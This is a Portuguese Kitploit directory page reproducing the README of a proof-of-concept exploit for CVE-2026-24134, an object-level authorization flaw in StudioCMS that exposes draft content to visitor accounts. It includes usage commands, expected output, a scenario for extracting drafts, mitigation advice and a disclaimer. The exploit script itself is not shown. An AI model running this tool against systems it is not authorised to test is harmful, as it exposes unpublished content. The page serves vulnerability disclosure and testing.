Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-24134-PoC — Prova de conceito de exploit para CVE-2026-24134, uma vulnerabilidade de Autorização Quebrada no Nível de Objeto no StudioCMS, demonstrando acesso não autorizado a conteúdo em rascunho. | Kitploit
Ferramentas/GitHubGitHub/filipegaudard/cve-2026-24134-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Segurança de APIsTestes de PenetraçãoAprendizado e Educação
GitHubfilipegaudard/cve-2026-24134-poc

CVE-2026-24134-PoC

Prova de conceito de exploit para CVE-2026-24134, uma vulnerabilidade de Autorização Quebrada no Nível de Objeto no StudioCMS, demonstrando acesso não autorizado a conteúdo em rascunho.

Ver Repositório
há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-24134-PoC

Visão Geral

Este repositório contém a Prova de Conceito (PoC) para CVE-2026-24134, uma vulnerabilidade de Autorização Quebrada no Nível de Objeto (BOLA) no StudioCMS.

Conteúdo

  • cve_2026_24134_poc.py - Script de exploração em Python

Pré-requisitos

  • StudioCMS<=0.1.1
root@kitploit:~
pip install requests colorama

Início Rápido

Exploração Manual

root@kitploit:~
# Uso básico
python3 cve_2026_24134_poc.py \
  -u http://localhost:4321 \
  --username visitor_user \
  --password visitor_pass \
  --uuid bad87630-69a4-4cd6-bcb2-6965839dc148

# Salvar saída em arquivo
python3 cve_2026_24134_poc.py \
  -u http://localhost:4321 \
  --username visitor_user \
  --password visitor_pass \
  --uuid bad87630-69a4-4cd6-bcb2-6965839dc148 \
  --save

Teste Automatizado

root@kitploit:~
python3 cve_2026_24134_poc.py \
  -u http://localhost:4321 \
  --auto-test \
  --visitor-user visitor01 \
  --visitor-pass visitorpass \
  --editor-user editor01 \
  --editor-pass editorpass \
  --uuid bad87630-69a4-4cd6-bcb2-6965839dc148

Argumentos

Obrigatórios

  • -u, --url - URL base do StudioCMS alvo
  • --uuid - UUID do conteúdo de rascunho alvo

Modo Manual

  • --username - Nome de usuário para autenticação
  • --password - Senha para autenticação

Modo de Teste Automatizado

  • --auto-test - Ativar teste automatizado
  • --visitor-user - Nome de usuário da conta de visitante
  • --visitor-pass - Senha da conta de visitante
  • --editor-user - Nome de usuário da conta de editor
  • --editor-pass - Senha da conta de editor

Opcionais

  • --save - Salvar o conteúdo da resposta em arquivo
  • --no-ssl-verify - Desativar verificação de certificado SSL

Cenários de Exemplo

Cenário 1: Testar se o sistema é vulnerável

root@kitploit:~
python3 cve_2026_24134_poc.py \
  --url http://target.com \
  --auto-test \
  --visitor-user test_visitor \
  --visitor-pass SecurePass123! \
  --editor-user test_editor \
  --editor-pass SecurePass456! \
  --uuid 12345678-1234-1234-1234-123456789abc

Saída esperada se vulnerável:

root@kitploit:~
[+] Successfully authenticated as test_visitor
[*] Detected user role: Visitor
[+] Successfully accessed draft content!
[!] VULNERABILITY CONFIRMED!

Saída esperada se corrigido:

root@kitploit:~
[+] Successfully authenticated as test_visitor
[*] Detected user role: Visitor
[*] Access denied (403 Forbidden)
[+] VULNERABILITY NOT PRESENT

Cenário 2: Extrair conteúdo de rascunho

root@kitploit:~
python3 cve_2026_24134_poc.py \
  --url http://localhost:4321 \
  --username attacker \
  --password pass123 \
  --uuid target-uuid-here \
  --save

Isso salvará o conteúdo completo do rascunho em draft_{uuid}.html.

Entendendo a Saída

Indicadores de Sucesso

  • [+] - Operação bem-sucedida (verde)
  • [*] - Mensagem informativa (azul)
  • [!] - Aviso (amarelo)
  • [-] - Erro (vermelho)

Códigos de Status HTTP

  • 200 OK - Vulnerável! Conteúdo de rascunho acessado
  • 403 Forbidden - Corrigido! Autorização adequada em vigor
  • 404 Not Found - UUID inválido ou implementação segura (retorna 404 em vez de revelar a existência)
  • 401 Unauthorized - Falha na autenticação

Mitigação

Se você estiver executando uma versão vulnerável do StudioCMS, atualize imediatamente para a versão corrigida.

Para Desenvolvedores

O Problema Real: As verificações de autorização eram realizadas no lado do cliente (JavaScript), não no lado do servidor.

De acordo com a equipe de desenvolvimento:

"Atualmente, a verificação do nível de classificação para redirecionamento está sendo feita no JS do cliente, que deveria ser substituída logo em seguida."

A Correção: Mover a autorização do cliente para o servidor.

Princípio-Chave: Nunca confie no cliente. Segurança no lado do cliente = melhoria de UX. Segurança no lado do servidor = proteção real.

Aviso Legal

IMPORTANTE: Esta ferramenta é fornecida apenas para fins educacionais e de testes de segurança autorizados.

  • Use apenas contra sistemas que você possui ou para os quais tenha permissão explícita por escrito para testar
  • O acesso não autorizado a sistemas de computador é ilegal na maioria das jurisdições
  • O autor não assume nenhuma responsabilidade pelo uso indevido desta ferramenta
  • Sempre siga práticas de divulgação responsável

Referências

  • CVE: CVE-2026-24134
  • CVSS: 6.5 Alta
  • CWE: CWE-639
  • OWASP: API1:2023 - Autorização Quebrada no Nível de Objeto

Contato

Para perguntas sobre esta PoC ou vulnerabilidade:

  • Autor: Filipe Gaudard

Licença

Esta PoC é liberada para fins educacionais. Use com responsabilidade e ética.

Baixar ferramenta